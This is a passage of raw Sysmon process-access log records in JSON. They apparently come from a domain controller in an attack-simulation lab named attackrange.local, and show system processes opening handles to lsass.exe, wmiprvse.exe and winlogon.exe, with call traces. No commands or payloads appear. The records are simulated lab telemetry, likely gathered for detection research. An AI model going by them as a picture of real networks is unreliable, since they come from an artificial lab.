C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.672","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5605,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.672\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.672","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5606,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.672\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-001074B50600}\r\nTargetProcessId: 1256\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.672","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-001074B50600}","TargetProcessId":"1256","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5607,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.672\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-001074B50600}\r\nTargetProcessId: 1256\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.672","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-001074B50600}","TargetProcessId":"1256","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5608,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.672\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-001074B50600}\r\nTargetProcessId: 1256\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.672","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-001074B50600}","TargetProcessId":"1256","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5609,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.687\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 3004\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nTargetProcessId: 1256\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x101541\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+20fee|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+43f7|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+15538|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1498a|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+146e6|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+140fe|C:\\Windows\\system32\\wbem\\wbemcore.dll+b920|C:\\Windows\\system32\\wbem\\wbemcore.dll+255ff|C:\\Windows\\system32\\wbem\\wbemcore.dll+24a9a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2485e|C:\\Windows\\system32\\wbem\\wbemcore.dll+2685b|C:\\Windows\\system32\\wbem\\wbemcore.dll+22b78|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.687","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"3004","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","TargetProcessId":"1256","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x101541","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+20fee|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+43f7|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+15538|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1498a|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+146e6|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+140fe|C:\\Windows\\system32\\wbem\\wbemcore.dll+b920|C:\\Windows\\system32\\wbem\\wbemcore.dll+255ff|C:\\Windows\\system32\\wbem\\wbemcore.dll+24a9a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2485e|C:\\Windows\\system32\\wbem\\wbemcore.dll+2685b|C:\\Windows\\system32\\wbem\\wbemcore.dll+22b78|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5610,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.687\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nTargetProcessId: 1256\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.687","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","TargetProcessId":"1256","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5611,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.687\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nTargetProcessId: 1256\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.687","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","TargetProcessId":"1256","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5612,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-0010104A0000}\r\nTargetProcessId: 784\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: 